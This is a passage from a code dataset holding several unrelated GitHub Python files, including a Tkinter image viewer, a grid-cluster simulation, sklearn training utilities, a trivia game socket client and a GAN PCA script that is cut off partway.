tk.Canvas(self.win, height=self.ny, width=self.nx)\n self.can.pack()\n self.compute_display()\n# self.can.create_image(0, 0, image=self.photo, anchor=tk.NW)\n self.win.bind(\"c\", self.max_contrast)\n self.win.bind(\"q\", self.quit) \n self.win.bind(\"\", self.quit) \n self.win.bind(\"\", self.on_move)\n self.win.bind(\"\", self.zoom_in)\n self.win.bind(\"\", self.zoom_reset) \n self.win.bind(\"\", self.zoom_out) \n self.win.mainloop()\n\n def compute_display(self):\n v = self.crop(self.u, self.x0, self.y0, self.nx, self.ny, self.zoom, self.zoom_method, 0)\n den = max(1e-100,self.dyn[1]-self.dyn[0])\n v = np.minimum(255,np.maximum(0,255*(v-self.dyn[0])/den))\n header = 'P5 '+str(self.nx)+' '+str(self.ny)+' 255 '\n xdata = bytes(header, 'ascii') + v.astype(dtype=np.uint8).tostring()\n self.photo = tk.PhotoImage(width=self.nx, height=self.ny, data=xdata, format='PPM')\n self.can.create_image(0, 0, image=self.photo, anchor=tk.NW)\n \n def crop(self, u, x0, y0, nx, ny, zoom, zoom_method, bg):\n v = bg * np.ones((ny,nx))\n x = x0 + np.arange(nx)/zoom # positions sur u\n y = y0 + np.arange(ny)/zoom\n # interpolation plus proche voisin\n x = np.round(x).astype('int')\n y = np.round(y).astype('int')\n ix1 = np.argmax(x>=0)\n iy1 = np.argmax(y>=0) \n ix2 = nx - np.argmax(x[::-1]0 or fig.UserData.z>1:\n oldz = fig.UserData.z;\n fig.UserData.z = max(1,fig.UserData.z+dz);\n if fig.UserData.z==1:\n fig.UserData.x0 = 1;\n fig.UserData.y0 = 1;\n else:\n pos = mouse_location(fig);\n # nx0 vérifie x0+xpos/oldz = nx0+xpos/newz\n fig.UserData.x0 = fig.UserData.x0+pos(1)/oldz-pos(1)/fig.UserData.z;\n fig.UserData.y0 = fig.UserData.y0+pos(2)/oldz-pos(2)/fig.UserData.z;\n update_figname(fig);\n redraw = true;\n else:\n printf(\"unrecognized event: %s\\n\",event.EventName);\n if redraw:\n im.CData = compute_display(fig.UserData);\n \"\"\"\n\n # zoom in\n def zoom_in(self, event):\n oldz = self.zoom\n self.zoom *= 2\n self.x0 = self.x0 + (event.x-1)*(1/oldz - 1/self.zoom)\n self.y0 = self.y0 + (event.y-1)*(1/oldz - 1/self.zoom)\n# print(\"new zoom is {}\".format(self.zoom))\n self.compute_display()\n self.on_move(event)\n \n # zoom reset\n def zoom_reset(self, event):\n if self.zoom!=1:\n self.zoom = 1\n self.x0, self.y0 = 0, 0\n self.compute_display()\n self.on_move(event)\n\n # zoom out\n def zoom_out(self, event):\n if self.zoom==2:\n self.zoom_reset(event)\n if self.zoom>1:\n oldz = self.zoom\n self.zoom //= 2\n self.x0 = self.x0 + (event.x-1)*(1/oldz - 1/self.zoom)\n self.y0 = self.y0 + (event.y-1)*(1/oldz - 1/self.zoom)\n# print(\"new zoom is {}\".format(self.zoom))\n self.compute_display()\n self.on_move(event) \n\n # maximize contrast\n def max_contrast(self, event):\n v = self.crop(self.u, self.x0, self.y0, self.nx, self.ny, self.zoom, self.zoom_method, 0)\n self.dyn = [np.min(v), np.max(v)]\n self.on_move(event)\n self.compute_display()\n \n def on_move(self, event):\n x = self.x0 + (event.x-1)/self.zoom\n y = self.y0 + (event.y-1)/self.zoom\n if self.zoom==1:\n self.win.title(self.name+\" x={:g} y={:g} (range=[{:g},{:g}])\".format(x,y,self.dyn[0],self.dyn[1]))\n else:\n self.win.title(self.name+\" x={:g} y={:g} (range=[{:g},{:g}], zoom={})\".format(x,y,self.dyn[0],self.dyn[1],self.zoom))\n \n def quit(self, event):\n self.win.destroy()\n\n# Zoom / Unzoom of an image with Fourier interpolation\n# (zero-padding / frequency cutoff)\ndef fftzoom(u, z=2):\n ny,nx = u.shape\n mx = int(z*nx)\n my = int(z*ny)\n dx = nx//2 - mx//2\n dy = ny//2 - my//2\n if z>=1:\n #===== zoom in\n v = np.zeros((my,mx), dtype=np.complex)\n v[-dy:-dy+ny,-dx:-dx+nx] = np.fft.fftshift(np.fft.fft2(u))\n else:\n #===== zoom out\n f = np.fft.fftshift(np.fft.fft2(u));\n v = f[dy:dy+my, dx:dx+mx]\n if mx%2==0:\n v[:, 0] = 0 # cancel non-Shannon frequencies\n if my%2==0:\n v[0, :] = 0 # cancel non-Shannon frequencies\n return z*z*np.real(np.fft.ifft2(np.fft.ifftshift(v)))\n","repo_name":"louisbzk/Subpixel","sub_path":"TP_2/imtools.py","file_name":"imtools.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19698701347","text":"def create_grid(columns):\n grid = [list(column) for column in zip(*columns)]\n return grid\n\n\ndef get_sub_grids(grid):\n grid_2x2 = [row[2:4] for row in grid[2:4]]\n grid_4x4 = [row[1:5] for row in grid[1:5]]\n return grid_2x2, grid_4x4\n\n\ndef dfs(i, j, grid, wild='🃏'):\n symbol = grid[i][j]\n wild_neighbors = set() # This set will hold the symbols of the non-wild neighbors of a wild cell\n\n if symbol == wild: # Check if there are any same symbol neighbors\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n nx, ny = i + dx, j + dy\n if 0 <= nx < len(grid) and 0 <= ny < len(grid[0]) and grid[nx][ny] != wild:\n wild_neighbors.add(grid[nx][ny])\n\n stack = [(i, j)]\n visited = set()\n cluster_cells = set()\n while stack:\n x, y = stack.pop()\n if (x, y) in visited:\n continue\n visited.add((x, y))\n cluster_cells.add((x, y))\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n nx, ny = x + dx, y + dy\n if 0 <= nx < len(grid) and 0 <= ny < len(grid[0]):\n if grid[nx][ny] in wild_neighbors or (grid[nx][ny] == symbol and grid[nx][ny] != wild) or grid[nx][ny] == wild:\n stack.append((nx, ny))\n\n return cluster_cells if len(cluster_cells) >= 4 else set() # Return cells if it's a cluster\n\n\n\ndef count_clusters(grid):\n all_cluster_cells = set() # Keep track of all cells that are part of any cluster\n clusters = []\n cluster_sizes = []\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if (i, j) not in all_cluster_cells: # Only start a new DFS if the cell is not part of any cluster\n cluster_cells = dfs(i, j, grid)\n if cluster_cells: # If it's a cluster\n all_cluster_cells.update(cluster_cells) # Add the cells to the set of all cluster cells\n clusters.append(cluster_cells)\n cluster_sizes.append(len(cluster_cells))\n return len(clusters), cluster_sizes\n\n\n\n\n\n# columns = [\n# ['⭐', '🟩', '🔷', '⭐', '🔷', '🔶'],\n# ['⭐', '⭐', '🔶', '⭐', '🔷', '🔶'],\n# ['🔷', '🟩', '🃏', '🃏', '🔷', '🟩'],\n# ['⭐', '🟩', '🃏', '🃏', '🃏', '🟩'],\n# ['⭐', '🔶', '🔷', '⭐', '🔷', '🔶'],\n# ['⭐', '🟩', '🔷', '🟩', '🔷', '🃏']\n# ]\ncolumns = [\n ['⭐', '🟩', '🔷', '⭐', '🔷', '🔶'],\n ['⭐', '🃏', '🃏', '🃏', '🔷', '🔶'],\n ['🔷', '🃏', '🟩', '🟩', '🔷', '🟩'],\n ['⭐', '🃏', '🔶', '⭐', '🔶', '🟩'],\n ['⭐', '🔶', '🔷', '⭐', '🔷', '🔶'],\n ['⭐', '🟩', '🔷', '🟩', '🔷', '🔶']\n]\n\ngrid = create_grid(columns)\ngrid_2x2, grid_4x4 = get_sub_grids(grid)\n\nclusters_2x2, sizes_2x2 = count_clusters(grid_2x2)\nclusters_4x4, sizes_4x4 = count_clusters(grid_4x4)\nclusters_6x6, sizes_6x6 = count_clusters(grid)\n\nprint(f\"2x2 grid has {clusters_2x2} clusters with sizes {sizes_2x2}\")\nprint(f\"4x4 grid has {clusters_4x4} clusters with sizes {sizes_4x4}\")\nprint(f\"6x6 grid has {clusters_6x6} clusters with sizes {sizes_6x6}\")\n\n","repo_name":"Fishcuit/AhluicSim","sub_path":"oldDfsSims/sim4.py","file_name":"sim4.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38763796747","text":"''' This file contains sklearn models for downstream takss '''\n\n# utils\nfrom functools import partial\n\nimport numpy as np\nimport pandas as pd\n# models\nfrom sklearn.ensemble import (GradientBoostingRegressor,\n RandomForestClassifier, RandomForestRegressor)\nimport xgboost as xgb\nfrom sklearn.feature_selection import SelectFdr, SelectKBest, f_regression\nfrom sklearn.linear_model import ElasticNet, LogisticRegression\n# Metrics\nfrom sklearn.metrics import (accuracy_score, average_precision_score, f1_score,\n make_scorer, mean_absolute_error,\n mean_absolute_percentage_error,\n mean_squared_error, precision_score, r2_score,\n recall_score, roc_auc_score)\n# hyperparameter tunning\nfrom sklearn.model_selection import GridSearchCV, KFold\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier, MLPRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC, SVR\nfrom sklearn.utils import resample\nfrom utils.python_logger import get_logger\nfrom tqdm import tqdm\n\nfrom applications.tasks.task_base import TaskBase\n\nLOGGER = get_logger()\n\n\nREGRESSION_METRIC_DICT = {'MAE': mean_absolute_error,\n 'MAPE': mean_absolute_percentage_error,\n 'RMSE': partial(mean_squared_error, squared=False),\n 'R2': r2_score}\n\n\nCLASSIFICATION_METRIC_DICT = {'Accuracy': accuracy_score,\n 'F1': partial(f1_score, average='weighted'),\n 'Precision': partial(precision_score, average='weighted'),\n 'Recall': partial(recall_score, average='weighted'),\n 'AUROC': partial(roc_auc_score, average='weighted', multi_class='ovr'),\n 'AUPRC': partial(average_precision_score, average='weighted'),\n }\n\n\n# Dictionaries\nRANDOM_DICT = {'random_state': 9001}\nNJOB_DICT = {'n_jobs': -1} # using all the processers\n\n\n# model_dicts\n# REGRESSION\nli_reg = {'basemodel': partial(ElasticNet, l1_ratio=1, normalize=True, **RANDOM_DICT),\n 'params': dict(alpha=[0.1, 0.5, 1])}\n\nrfr = {'basemodel': partial(RandomForestRegressor, **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(n_estimators=[10, 100, 200])}\n\nsvr = {'basemodel': partial(SVR, max_iter=1000), # efficiency\n 'params': dict(degree=[3, 5, 7], C=[0.1, 1, 10], epsilon=[0.01, 0.1, 1])}\n\nmlpr = {'basemodel': partial(MLPRegressor, **RANDOM_DICT, early_stopping=True, max_iter=2000),\n 'params': dict(hidden_layer_sizes=[(100, 10),\n (100, 20),\n (200, 20),\n (400, 40)])}\n\ngboost = {'basemodel': partial(GradientBoostingRegressor, **RANDOM_DICT),\n 'params': dict(learning_rate=[0.01],\n n_estimators=[200])}\n\nREGRESSION_MODELS = {'linear_regression': li_reg,\n 'random_forest': rfr,\n 'svr': svr,\n 'mlp': mlpr,\n }\n\n# CLASSIFICATION\nlr = {'basemodel': partial(LogisticRegression, penalty='l1', solver='saga', **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(C=[0.01, 0.1])}\n\nknn = {'basemodel': partial(KNeighborsClassifier, **NJOB_DICT),\n 'params': dict(n_neighbors=[3, 5, 7, 10], p=[1, 2, 5])}\n\nsvc = {'basemodel': partial(SVC, **RANDOM_DICT, probability=True, max_iter=1000),\n 'params': dict(C=[0.01, 0.1, 1], degree=[1, 2, 3])}\n\nrf = {'basemodel': partial(RandomForestClassifier, **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(n_estimators=[100, 200, 500, 1000, ],\n max_depth=[10, 100],\n max_features=['auto'],\n min_samples_leaf=[1, 4])}\n\nmlp = {'basemodel': partial(MLPClassifier, **RANDOM_DICT, early_stopping=True, max_iter=2000),\n 'params': dict(hidden_layer_sizes=[(100, 10), (100, 20), (200, 20), (400, 40)])}\n\nxgbtree = {'basemodel': partial(xgb.XGBClassifier, verbosity=1, **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(learning_rate=[0.01, 0.1],\n n_estimators=[100],\n reg_alpha=[1, 10])}\n\nCLASSIFICATION_MODELS = {'logistic_regression': lr,\n 'k_nearest_neighbors': knn,\n 'svc': svc,\n 'random_forest': rf,\n 'mlp': mlp,\n 'xgboost': xgbtree}\n\n\n# preprocessing for pipeline\nfor modelname, modeldict in REGRESSION_MODELS.items():\n pdict = modeldict['params'].copy()\n modeldict['params'] = {}\n for param, paramvalue in pdict.items():\n modeldict['params'][\"predictor__\"+param] = paramvalue\n\nfor modelname, modeldict in CLASSIFICATION_MODELS.items():\n pdict = modeldict['params'].copy()\n modeldict['params'] = {}\n for param, paramvalue in pdict.items():\n modeldict['params'][\"predictor__\"+param] = paramvalue\n\n\nMODELS = {'regression': REGRESSION_MODELS,\n 'classification': CLASSIFICATION_MODELS}\n\n\ndef model_evaluation(y_true,\n y_pred,\n y_proba=None,\n y_decision=None,\n scoring_func_dict=REGRESSION_METRIC_DICT,\n task_type='regression'):\n if task_type == \"regression\":\n return dict((key, func(y_true, y_pred)) for (key, func) in scoring_func_dict.items())\n elif task_type == \"classification\":\n result_dict = {}\n for (key, func) in scoring_func_dict.items():\n if key == 'AUROC':\n if y_proba.shape[1] > 2:\n y_score = y_proba\n else:\n y_score = y_proba[:, 1]\n result_dict[key] = func(y_true=y_true,\n y_score=y_score)\n elif key == 'AUPRC':\n continue # NOTE: not implemented at the moment\n if y_proba.shape[1] > 2:\n continue\n result_dict[key] = func(y_true=y_true,\n y_score=y_proba[:, 1])\n else:\n result_dict[key] = func(y_true=y_true,\n y_pred=y_pred)\n return result_dict\n\n\ndef grid_cv_model(model, params, X, Y, scoring=None, verbose=1,\n cv_params={\"n_splits\": 3, \"shuffle\": True, \"random_state\": 9001}):\n cv = KFold(**cv_params)\n clf = GridSearchCV(model,\n params,\n cv=cv,\n scoring=scoring,\n verbose=int(verbose)*2) # verbose = 2 (a little more information) or 0\n clf.fit(X, Y)\n LOGGER.info(f\"best parameters: {clf.best_params_}\")\n return clf\n\n\ndef find_best_param(model_meta, X, Y, hparams={}, search=True, verbose=1):\n if search:\n basemodel = model_meta['basemodel']()\n clf = GridSearchCV(basemodel,\n model_meta['params'],\n verbose=int(verbose)*2) # verbose = 2 (a little more information) or 0\n clf.fit(X['train'], Y['train'])\n LOGGER.info(f\"best parameters: {clf.best_params_}\")\n return clf.best_params_\n else:\n return hparams\n\n\ndef model_pipeline(model_base, base_params={}, best_params={}):\n # new step: feature selection\n # TODO: implement this\n model = Pipeline(\n [('scaler', StandardScaler()),\n # ('selector', SelectFdr(score_func=f_regression, alpha=1e-2)),\n # ('selector', SelectKBest(score_func=f_regression, k=500)),\n ('predictor', model_base(**base_params)),\n ], verbose=True)\n model.set_params(**best_params)\n return model\n\n\ndef cv_tuning_model(model,\n model_param_dict: dict,\n X, Y):\n \"\"\" tune the model with CV, return best parameters \"\"\"\n clf = grid_cv_model(model=model,\n params=model_param_dict,\n X=X,\n Y=Y,)\n\n best_params = clf.best_params_\n cv_results = {k: v for k, v in clf.cv_results_.items()\n if k.endswith(\"score\")}\n return best_params, cv_results\n\n\ndef train_eval_model(X: dict, Y: dict, model,\n task_type: str, inverse_transform=None,):\n\n metrics_func_dict = REGRESSION_METRIC_DICT if task_type == \"regression\" else CLASSIFICATION_METRIC_DICT\n # 2. train model\n model = model.fit(X['train'], Y['train'])\n\n # 3. evaluation\n if task_type == 'regression':\n if inverse_transform != None:\n y_pred = inverse_transform(Y=model.predict(X['val']))\n else:\n y_pred = model.predict(X['val'])\n y_true = Y['val']\n\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=None,\n y_decision=None,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n pred_dict = {}\n elif task_type == 'classification':\n y_true = Y['val']\n y_pred = model.predict(X['val'])\n # multiclass, should not limit class\n y_proba = model.predict_proba(X['val'])\n # y_decision = model.decision_function(X['val'])\n y_decision = None\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=y_proba,\n y_decision=y_decision,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n pred_dict = {'y_proba': y_proba, 'y_decision': y_decision}\n return metrics, y_pred, pred_dict\n\n\ndef train_eval_bootstrapping(times: int, X: dict, Y: dict, model,\n task_type: str, inverse_transform=None, seed=None):\n results = {}\n metrics_func_dict = REGRESSION_METRIC_DICT if task_type == \"regression\" else CLASSIFICATION_METRIC_DICT\n for i in tqdm(range(times)):\n # bootstrapping:\n index = resample(\n list(range(len(X['train']))), replace=True, random_state=seed)\n x_train, y_train = X['train'][index], Y['train'][index]\n\n # 2. train model\n model = model.fit(x_train, y_train)\n\n # 3. evaluation\n if task_type == 'regression':\n if inverse_transform != None:\n y_pred = inverse_transform(Y=model.predict(X['val']))\n else:\n y_pred = model.predict(X['val'])\n y_true = Y['val']\n\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=None,\n y_decision=None,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n # pred_dict = {}\n elif task_type == 'classification':\n y_true = Y['val']\n y_pred = model.predict(X['val'])\n # multiclass, should not limit class\n y_proba = model.predict_proba(X['val'])\n # y_decision = model.decision_function(X['val'])\n y_decision = None\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=y_proba,\n y_decision=y_decision,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n # pred_dict = {'y_proba': y_proba, 'y_decision': y_decision}\n if not results:\n results = metrics.copy()\n for k in results.keys():\n results[k] = [results[k]]\n\n else:\n for k in results.keys():\n results[k].append(metrics[k])\n return results\n\n\ndef predict_with_model(task_type: str,\n X: dict, Y: dict,\n inverse_transform=None,\n model_name: str = 'random_forest',\n hparam_dict={},\n tune_hparams=True,\n bootstrapping=False,\n verbose=True):\n \"\"\"\n NOTE: change preprocessing to be out side this function; avoid repeated operations\n Make predictions with one type of model, hparams are tuned, model results are returned\n Args:\n X (Dict): input X, has key 'train' and 'val'\n Y (Dict): input Y, has key 'train' and 'val'\n task_type (str, optional): type of task, should be either classification or regression. Defaults to 'classification'.\n model_name (str, optional): name of the model. Defaults to 'random_forest'.\n verbose (bool, optional): whether to output some progress. Defaults to True.\n\n Returns:\n Dict: metrics\n \"\"\"\n\n if verbose:\n LOGGER.info(f\"======{model_name}======\")\n assert task_type in ['classification', 'regression']\n\n # 1. hparams, either load or search or skip\n model_meta = MODELS[task_type][model_name]\n model = model_pipeline(model_base=model_meta['basemodel'])\n\n if not tune_hparams:\n # if not tune hyperparameters, then just load previous best parameters, if no, just left blank\n best_params = {\n } if model_name not in hparam_dict else hparam_dict[model_name]\n else:\n best_params, cv_results = cv_tuning_model(model=model,\n model_param_dict=model_meta['params'],\n X=X['train'],\n Y=Y['train'])\n LOGGER.info(f\"result for CV:{cv_results}\")\n model = model_pipeline(model_base=model_meta['basemodel'],\n best_params=best_params)\n if not bootstrapping:\n metrics, y_pred, pred_dict = train_eval_model(X=X, Y=Y,\n model=model, task_type=task_type,\n inverse_transform=inverse_transform)\n LOGGER.info(f\"result for validation set:{metrics}\")\n return metrics, y_pred, pred_dict, best_params\n else:\n metrics = train_eval_bootstrapping(times=10, X=X, Y=Y, model=model, task_type=task_type,\n inverse_transform=inverse_transform)\n\n LOGGER.info(f\"result for validation set:{metrics}\")\n return metrics, best_params\n\n\ndef predict_task(task: TaskBase,\n X, Y,\n models='all',\n hparam_dict={},\n results=[],\n tune_hparams=True,\n bootstrapping=False,\n verbose=True):\n\n # draw AUROC and AUPRC curve for classification\n prediction_models = MODELS[task.task_type]\n if models == 'all':\n models = list(prediction_models.keys())\n elif isinstance(models, str):\n models = [models]\n assert isinstance(models, list)\n LOGGER.info(f\"models used {models}\")\n \n ### initialize results\n if results:\n result_dict, pred_dict, pred_stats, best_hparams = results\n pred_dict['true'] = Y['val']\n else:\n result_dict, pred_dict, pred_stats, best_hparams = {}, {}, {}, {}\n pred_dict['true'] = Y['val']\n if bootstrapping:\n result_dict_bootstrapping = {}\n # preprocessing with task.transform\n if verbose:\n LOGGER.info(\n f\"Before transform: X shape = train:{np.array(X['train']).shape}, val:{np.array(X['val']).shape}; Y shape = train:{np.array(Y['train']).shape}, val:{np.array(Y['val']).shape}\")\n\n ### process data\n X_processed, Y_processed = task.transform(X, Y)\n\n if verbose:\n # report data summary\n data_summary(X_processed, Y_processed, task.task_type)\n\n ### dimensionality reduction\n \n\n ### predict\n for model_name in models:\n model_result = predict_with_model(task_type=task.task_type,\n X=X_processed, Y=Y_processed,\n model_name=model_name,\n hparam_dict=hparam_dict,\n tune_hparams=tune_hparams,\n bootstrapping=bootstrapping,\n verbose=verbose)\n if not bootstrapping:\n result_dict[model_name], \\\n pred_dict[model_name], \\\n pred_stats[model_name], \\\n best_hparams[model_name] = model_result\n else:\n result_dict_bootstrapping[model_name], best_hparams[model_name] = model_result\n if not bootstrapping:\n return result_dict, pred_dict, pred_stats, best_hparams\n\n else:\n return result_dict_bootstrapping, best_hparams\n\n\ndef data_summary(X, Y, task_type):\n data_summary = f\"X shape = train:{X['train'].shape}, val:{X['val'].shape}; Y shape = train:{Y['train'].shape}, val:{Y['val'].shape}\"\n if task_type == \"classification\":\n vtrain, ctarin = np.unique(\n np.array(Y['train']), return_counts=True)\n train_count = pd.DataFrame(np.array((vtrain, ctarin)).T,\n columns=[\"value\", \"count\"])\n vval, cval = np.unique(\n np.array(Y['val']), return_counts=True)\n val_count = pd.DataFrame(np.array((vval, cval)).T,\n columns=[\"value\", \"count\"])\n data_summary += \"\\n\" + \\\n f\"Y classes = \\n train: \\n{train_count}; \\n val: \\n{val_count}\"\n LOGGER.info(data_summary)\n pass\n","repo_name":"gevaertlab/Variational-Auto-Encoder","sub_path":"applications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"368043998","text":"class listAverage():\n\n def average(self):\n n = int(input(\"Enter number of elements in Array\"))\n a= []\n for i in range(0,n):\n element = int(input(\"Enter the number in the Array\"))\n a.append(element)\n avg = sum(a)/n\n print(\"Average of Numbers is : \" + str(avg) + \"Number of elements are : \" + str(n) )\n\n\nla = listAverage()\nla.average()\n","repo_name":"Deepti3006/InterviewPractise","sub_path":"averageOfList.py","file_name":"averageOfList.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43391454701","text":"import socket\r\nimport chatlib # To use chatlib functions or consts, use chatlib.****\r\n\r\nMAX_MSG_SIZE = 1024\r\nSERVER_IP = \"127.0.0.1\" # Our server will run on same computer as client\r\nSERVER_PORT = 5678\r\n\r\n\r\ndef build_and_send_message(conn, code, data=''):\r\n\r\n msg = chatlib.build_message(code,data)\r\n conn.send(msg.encode())\r\n\r\ndef recv_message_and_parse(conn):\r\n\r\n msg = conn.recv(MAX_MSG_SIZE).decode()\r\n cmd, data = chatlib.parse_message(msg)\r\n return cmd, data\r\n\r\ndef connect():\r\n\r\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n return my_socket\r\n\r\ndef error_and_exit(error_msg):\r\n\r\n print(error_msg)\r\n exit()\r\n\r\ndef build_send_recv_parse(conn, command, data=''):\r\n\r\n build_and_send_message(conn, command,data)\r\n cmd, code = recv_message_and_parse(conn)\r\n return cmd, code\r\n\r\ndef get_score(conn):\r\n\r\n cmd, data = build_send_recv_parse(conn,chatlib.PROTOCOL_CLIENT[\"myscore_msg\"])\r\n if cmd == chatlib.PROTOCOL_SERVER[\"yourscore_msg\"] :\r\n return \"your score is \" + data\r\n else:\r\n error_and_exit(cmd)\r\n\r\ndef get_highscore(conn):\r\n\r\n cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"highscore_msg\"])\r\n if cmd == chatlib.PROTOCOL_SERVER[\"allscore_msg\"]:\r\n return data\r\n else:\r\n error_and_exit(cmd)\r\n\r\ndef play_question(conn):\r\n\r\n cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"getquestion_msg\"])\r\n\r\n if cmd == chatlib.PROTOCOL_SERVER[\"yourquestion_msg\"]:\r\n splited = data.split('#')\r\n n, a, b, c, d, e = splited\r\n print('Q: ' + a, \" \\n 1. \" + b, \"\\n 2. \" + c, \"\\n 3. \" + d, \" \\n 4. \" + e)\r\n\r\n elif cmd == chatlib.PROTOCOL_SERVER[\"noquestion_msg\"]:\r\n print(\"GAME OVER\")\r\n logout(conn)\r\n exit()\r\n\r\n else:\r\n error_and_exit(cmd)\r\n\r\n answer = input(\"Please choise your answer [1-4]:\")\r\n cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"sendanswer_msg\"],n + '#'+ splited[int(answer)+1])\r\n\r\n if cmd == chatlib.PROTOCOL_SERVER[\"correctanswer_msg\"] or chatlib.PROTOCOL_SERVER[\"wronganswer_msg\"]:\r\n if cmd == chatlib.PROTOCOL_SERVER[\"correctanswer_msg\"]:\r\n print(\"YES!!!!\")\r\n else:\r\n print(\"Nope, correct answer is #\" + data)\r\n else:\r\n error_and_exit(cmd)\r\n\r\ndef get_logged_users(conn):\r\n cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"logged\"])\r\n if cmd == chatlib.PROTOCOL_SERVER[\"loggedanswer_msg\"]:\r\n return data\r\n else:\r\n error_and_exit(cmd)\r\n\r\n\r\ndef login(conn):\r\n\r\n conn.connect((SERVER_IP, SERVER_PORT))\r\n msg = ''\r\n\r\n while 'LOGIN_OK' not in msg:\r\n username = input(\"Please enter username: \\n\")\r\n password = input(\"Please enter the password: \\n\")\r\n msg = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"login_msg\"], (username+\"#\"+password))\r\n\r\n if 'LOGIN_OK' not in msg:\r\n try:\r\n print(' '.join(msg))\r\n except:\r\n print(msg)\r\n print(\"Logged in!\")\r\n\r\n\r\ndef logout(conn):\r\n\r\n build_and_send_message(conn,chatlib.PROTOCOL_CLIENT[\"logout_msg\"])\r\n print(\"Goodbye!\")\r\n conn.close()\r\n\r\ndef main():\r\n msg = ''\r\n conn = connect()\r\n\r\n login(conn)\r\n\r\n while msg != 'q':\r\n msg = input('p Play a trivia question\\n'\r\n 's Get my score \\n'\r\n 'h Get high score\\n'\r\n 'l Get logged users\\n'\r\n 'q Quit\\n'\r\n 'Please enter your choice:')\r\n\r\n if msg == 's':\r\n print(get_score(conn))\r\n\r\n elif msg == 'h':\r\n print(get_highscore(conn))\r\n\r\n elif msg =='p':\r\n play_question(conn)\r\n\r\n elif msg == 'l':\r\n print(get_logged_users(conn))\r\n\r\n\r\n logout(conn)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"AriPilotCode/Trivia_game-","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"410441023","text":"class Solution:\n def restoreString(self, s: str, indices: list[int]) -> str:\n\n new_s = [''] * len(s)\n\n for i, ind in enumerate(indices):\n new_s[ind] = s[i]\n\n return ''.join(new_s)\n\n\nif __name__ == '__main__':\n s = \"codeleet\"\n indices = [4, 5, 6, 7, 0, 2, 1, 3]\n print(Solution().restoreString(s, indices))\n","repo_name":"glebmikha/algorithms-leetcode-python-scha-poreshaem","sub_path":"episode49-2021-06-17/q1528-shuffle-string.py","file_name":"q1528-shuffle-string.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"35113757106","text":"import models.tbgan as tbgan\nimport os\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport menpo.io as mio\nfrom sklearn.decomposition import PCA\n\nfrom config import tbgan_snapshot_name, clip_templates, args\nfrom utils import load_pkl, save_pkl, create_result_subdir, close_session\n\n\ndef create_pca_components(run_id, snapshot=None, grid_size=[1, 1], minibatch_size=8, num_samples=1000, n_components=10):\n # Set random seed\n seed = np.random.choice(range(1000))\n random_state = np.random.RandomState(seed)\n\n # Load model\n tbgan_model = tbgan.load_model(tbgan_snapshot_name)\n\n # Choose layers\n latents_in = \"Gs/latents_in:0\"\n labels_in = \"Gs/labels_in:0\"\n inter_layer = \"Gs/128x128/Conv1/PixelNorm/mul:0\"\n\n # Create random z and exp\n all_latents = random_state.randn(np.prod(grid_size)*num_samples, *tbgan_model.input_shape[1:]).astype(np.float32) \n all_labels = np.zeros([all_latents.shape[0], 7], np.float32)\n\n all_inter_latent = []\n\n for png_idx in range(int(num_samples/minibatch_size)):\n start = time.time()\n print('Generating samples %d-%d / %d... in ' % (png_idx*minibatch_size, (png_idx+1)*minibatch_size, num_samples), end='')\n latents = all_latents[png_idx*minibatch_size : (png_idx+1)*minibatch_size]\n labels = all_labels[png_idx*minibatch_size : (png_idx+1)*minibatch_size]\n\n sess = tf.get_default_session()\n inter_latent = sess.run(inter_layer, feed_dict={latents_in: latents, labels_in: labels})\n print(inter_latent.shape)\n print(len(inter_latent))\n all_inter_latent.extend(inter_latent) # concatenate two lists \n print('%0.2f seconds' % (time.time() - start))\n\n # PCA\n start = time.time()\n print('Calculating PCA... in ', end='') \n \n all_inter_latent = np.array(all_inter_latent)\n flat_inter_latent = all_inter_latent.reshape(all_inter_latent.shape[0], -1) # this line depends on layer we choose. if we choose layer with shape (n, 128, 128), we need to flatten it to (n, 128*128) in order to apply PCA\n pca = PCA(n_components=n_components)\n pca.fit(flat_inter_latent)\n pca_comps = pca.components_\n\n print('%0.2f seconds' % (time.time() - start))\n\n save_pkl(pca_comps, 